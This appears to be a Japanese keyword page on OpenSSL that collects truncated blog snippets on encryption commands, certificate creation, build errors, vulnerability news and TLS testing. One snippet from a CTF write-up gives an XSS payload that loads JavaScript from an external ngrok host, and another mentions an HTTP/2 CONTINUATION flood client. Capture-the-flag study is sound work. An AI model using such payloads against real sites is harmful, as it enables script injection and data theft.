セキュリティーを要求される通信のためのプロトコルである「SSLプロトコル」と「TLSプロトコル」を容易に実装できるオープンソースパッケージ。ソフトウェアライブラリ。
Eric A. YoungとTim Hudsonにより開発された「SSLeay」を基に開発され、2014年現在ではネット上のウェブサイトのおよそ66%が使用されているとされる。
OpenSSL―暗号・PKI・SSL/TLSライブラリの詳細―
OpenSSLによるSSLサーバの構築―暗号技術とSSL
結論 オプション -nosalt を付与する。 具体例 1. -nosalt を付与しない場合 一見同じ結果に見えますが、全て異なっています。 $ echo "hogehoge" | openssl enc -e -aes-256-cbc -base64 -pbkdf2 -pass pass:foobar U2FsdGVkX19a4H6vBEvUMPTyd+Q7/27pFzaPQctnCfs= $ echo "hogehoge" | openssl enc -e -aes-256-cbc -base64 -pbkdf2 -pass pass:foobar U2FsdGVkX185H8E7L8W…
要約 注意事項 実行環境 現象 公式 対応 参考記事を元にperlのインストールとopenssl@1.1のアンインストールを実施 perlのインストール後にバージョン確認 openssl@1.1を強制的に削除する <補足>openssl@1.1の代替について 再度brew doctorを実行するもopenssl@1.1に依存ありの警告が表示される brew missingコマンドを実行して依存関係を確認する 念の為、brew usesコマンドでopenssl@1.1に依存するパッケージを探す openssl@1.1がインスートされていることを確認する expectを更新する expectを再イ…
昨晩見た夢を日記に書いてます ARMORED CORE 6って個人情報を匿名化して送信しているようなので(ゲーム開始前に同意を求められる)、サーバへの送信には暗号化した経路を使っているんだろうなぁ~と思って、おもむろにライセンス表記を確認すると クレジット - ARMORED CORE VI | アーマード・コア6 - ONLINE MANUAL OpenSSLが無い!!念のため秀丸エディタで???をgrepすると、 <appro@openssl.org>という文字列が何カ所か見つかります GrepでOpenSSLの第三者特許を含むモジュールは見つかりませんでした、なのでOpenSSLのビルド…
エラー 環境 windows10 python3.7 urllib3 2.0.4 エラーの内容 Traceback (most recent call last): File "pytorch_lstm_neuralnetwork.py", line 41, in <module> import torchvision.transforms as transforms File "C:\Users\XYZZZ\AppData\Local\Programs\Python\Python37\lib\site-packages\torchvision\__init__.py", line 5, in…
これまでおそらく1万回以上はググっているだろうオレオレ証明書の作成方法をまとめておきます。 この手の解説記事は五万とありますが、自分向けの備忘録として残します。 前提 秘密鍵の作成 証明書署名要求(CSR)の作成 証明書の作成 証明書の確認 前提 Windows 11 OpenSSL v3.1.1 秘密鍵の作成 openssl genrsa -out private_key.pem {ビット数} 証明書署名要求(CSR)の作成 openssl req -new -key private_key.pem -out csr.pem 以下のような質問を聞かれますが何も入力せずスルーします。 Coun…
malware-log.hatenablog.com security-tools.hatenablog.com 【目次】 概要 【図表】 【概要】 【最新情報】 記事 【ニュース】 【ブログ】 【公開情報】 【図表】 【検索】 関連情報 【関連まとめ記事】 概要 【図表】 一般的なCSPにおける脆弱なOpenSSLインスタンス(Wiz.io) 出典: https://www.bleepingcomputer.com/news/security/openssl-fixes-two-high-severity-vulnerabilities-what-you-need-to-know/ 【概要】…
OpenSSLで史上2度目の「致命的」レベルの脆弱性が発見される、2022年11月1日夜間に修正版がリリースされるため即更新を - GIGAZINE 脆弱性の詳細は見てないですが、 早急に修正版の「OpenSSL 3.0.7」が出るとのことなので、 該当のバージョンを利用中の場合はアップデート必須です。
前の職場で色々と悩みが多かったのでとりあえず辞めました。無職です。 最近は自分が個人で作成した環境やプログラミングをちゃんと整理しようとgitを勉強してます。 そんな無職のなか、OpenSSLのでcriticalに分類される脆弱性について修正リリースが今日~明日で出るらしいですね。 news.mynavi.jp 対象はバージョン3以降を使用しているもの全てらしい。あとOpenSSHもたしかOpenSSLを使用している記憶があったのでそっちも怪しいですね。 とりあえず個人で使用しているAmazon Linuxで使用しているサーバで以下確認してみました。 # openssl version Ope…
Python3.8にpsycopg2をインストールしようとしたところ、エラーが出て失敗した。 インストールしようとしたのはpsycopg2の2.8で、最新の2.9は普通にインストールできた。 大量のエラーメッセージが表示されるが重要なのは以下の部分。 ld: library not found for -lssl clang: error: linker command failed with exit code 1 (use -v to see invocation) error: command 'clang' failed with exit status 1 どうやらビルド時にリンカ(…
TLSの脆弱性が懸念されバージョンを1.2のみ使用することにし、他のバージョンの利用を停止するみたいな作業を行いました。 動作確認のためにサーバに対して、TLSのバージョン1.0および1.1で通信ができない事を確認することになり、opensslコマンドで検証することになりました。 その時の備忘録です。 opensslコマンドって? opensslコマンドはSSLおよびTLSの機能が実装したプログラムでオープンソースソフトウェアとして公開されています!以下の機能があります。 公開鍵暗号化操作 メッセージダイジェストの計算 暗号化と復号化 TLSクライアントとサーバーテスト など。 インストール方…
本記事はAP Tech Blog Weekのものになります。 はじめに こんにちは、エーピーコミュニケーションズ クラウド事業部の坂口です。 AWS CloudShell や AWS Cloud9 (、はたまた Amazon EC2) で Amazon Linux 2023 が使われるようになり、使いたい Python バージョンですぐに開発が行えず困ることがありました。 手元の Windows での Python バージョンに合わせられるようにしたいと思ったことがきっかけですが、つらつらと書いていこうと思います。 どんなひとに読んで欲しい Amazon Linux 2023 で Python…
この大会は2024/4/18 1:00(JST)~2024/4/22 14:00(JST)に開催されました。 今回は個人で参戦。結果は2338点で168チーム中8位でした。 あと1問で全問制覇だったのに残念です。 自分で解けた問題をWriteupとして書いておきます。 Day by Day (Misc 99) 日付がランダムに並んでいるので、空いている日付を答える問題。まず日付順にソートする。 $ cat dates | sort > dates_sorted ソートした日付を順に見ていき、次の行が次の日になっていない箇所を探す。 #!/usr/bin/env python3 from dat…
今日は主に YJIT の Class#superclass の最適化や reline と irb の最適化などがありました。 [480287d140] Peter Zhu 2024-04-23 19:34:03 UTC 共有ライブラリで GC の実装を上書きする機構のリファクタリング。なんか load_external_gc_func() というマクロを定義して文字列リテラルや関数名に特定の suffix を追加して展開しているようにしていますが、この時点では呼んだあとすぐに #undef しているから展開して書いても良さそうだけど後で分岐を追加する予定なのかな。 [afc7799c32] K…
状況 現状の Ruby が 3.3.0 の状況において $ rbenv install 3.3.1 を実行するとエラーが出て、以下のようなログが出ました。 1727 make[2]: ディレクトリ '/tmp/ruby-build.20240424104050.96605.DfIbDe/ruby-3.3.1/ext/ripper' から出ます 1728 make[2]: ディレクトリ '/tmp/ruby-build.20240424104050.96605.DfIbDe/ruby-3.3.1' に入ります 1729 tool/file2lastrev.rb:6:in `require': c…
2024年4月15日~2024年4月21日に読んだ中で気になったニュースとメモ書きです。社内勉強会TLSらじお第153回分。 [PQCロック機能の提案] [その他のニュース] ▼New Lattice Cryptanalytic Technique ▼SSL/TLS実践入門発売予定 ▼PuTTYのECDSA脆弱性 (CVE-2024-31497) ▼conventionalcommits.orgの証明書エラー ▼24年4月の量子コンピュータ業界 ▼DES/3DES illustrated [おわりに]
オレオレ証明書は使っていいのか? 暗号化されてるの? 暗号化はされている。しかし、通信相手が、秘密を守ってくれる相手(攻撃者ではない)であることが前提。 使っていいの? 相手の断定は難しい(実在証明が難しい)が使いますか?の答えが答え。 Docker操作とnginx設定 事前確認 docker container run -d -p 8080:80 --name nginx nginx docker exec -it xxxxxxxxxxxxxx /bin/bash exit docker stop xxxxxxxxxxxxxx docker exec -it nginx /bin/bash …
軽率にZen4のサーバーを買ったらCentOS7に非対応だった。Rocky Linux 8.6をインストールしてみたが、私の所属研究室でメインのアプリケーションであるVirtuosoを動かすのに苦労したので誰かの役に立つことを願ってメモしておく。ここで示すセットアップでIC6.18とICADVM23.1が起動することは確認している。 IC/ICC2とかも動かせれば追記する予定(まだ対応しているのかも調べてない)。 やることはライブラリのインストール、シンボリックリンクの作成、Virtuosoが持っているOS判定スクリプトの改変である。 まず以下のコマンドでライブラリを用意する(不要なものも含ん…
web/b01ler-ad web/3-city-elves-writeups web/imagehost web/pwnhub web/b01lers_casino web/b01ler-ad const content = req.body.content.replace("'", '').replace('"', '').replace("`", ''); '"`が使えない状態でXSSさせる問題。 それ以外の制約は特にないので、以下のようにscriptタグのソースで外部からjsを持ってきて使えばいい。 <script src=//c748-194-180-179-191.ngrok-fr…
森若です。 Red Hat Enterprise Linux 8(RHEL 8)は、セキュリティを強化するために多くの新機能を導入しましたが、その中でも特に運用の手間削減、セキュリティの一貫性向上、従来からの手順変更という点で運用管理への影響が大きいものがcrypto-policies(システム全体の暗号化ポリシー)です。この記事では、crypto-policiesがどのように拡張されてきたかを紹介します。 Crypto-Policiesとは? 背景としては、システムに含まれる多数のアプリケーション全体について暗号化などのレベルを揃えることが重要です。一部のサービスだけが強い暗号化を使っていて…
2024年4月8日~2024年4月14日に読んだ中で気になったニュースとメモ書きです。社内勉強会TLSらじお第152回分。 [Multi-Perspective Issuance Corroboration: Ballot SC-067] [Quantum Algorithms for Lattice Problems] [Pretendo SSSL Bug] [その他のニュース] ▼KRYPTOS Society Newsletter (1994-2003) ▼OpenSSL 3.3.0 ▼.NET 9とSSLKEYLOGFILE ▼SimpleX Chat + NTRU ▼第5回NIST …
Rubyの続きです。前回はRubyの分岐や反復など制御構造について書きました。今回からはWebフレームワークRuby on Railsに入っていきます!Railsチュートリアルにトライします。初回は環境構築編です。それではいきましょう!
何がおきたか Popの22.04にAWS Client VPNをインストールしたが, 「接続」ボタンを押したタイミングでクラッシュする 対処 古いSSLのライブラリを使えばいいらしい. blog.reinhard.codes curl http://archive.ubuntu.com/ubuntu/pool/main/o/openssl/libssl1.1_1.1.1f-1ubuntu2.22_amd64.deb -o libssl1.1_1.1.1f-1ubuntu2.22_amd64.deb sudo dpkg -i libssl1.1_1.1.1f-1ubuntu2.22_amd64.…
asdfでPythonのバージョンを追加インストールしようとしたら、下のようなエラーが起きて、できない状況に遭遇した。 % asdf install python 3.12.3 python-build 3.12.3 /Users/LOGNAME/.asdf/installs/python/3.12.3 python-build: use openssl@3 from homebrew python-build: use readline from homebrew Downloading Python-3.12.3.tar.xz... -> https://www.python.org/ft…
まとめ patch を適応しましょう Go は 1.22.2 にあげましょう 自分で立てたローカルで遊ぶだけにしてください [目次] CONTINUATION flood とは サーバーの準備 クライアントの実装 接続する Setting Frame Headers Frame Continuation Frame 動作確認: x/net 0.24.0 動作確認: x/net 0.22.0 おまけ GODEBUG について クライアント側のコード全体 Go でのパッチ内容 Links
※ 一応OpenSSLをCVE-2024-2511対策版に更新した(クライアント側なので問題の対象外) ✕ フォーム送信(HTTP POST)のエンコードの不具合修正 GCさくらへの登録や、拍手投稿などに不具合が起きていた可能性があります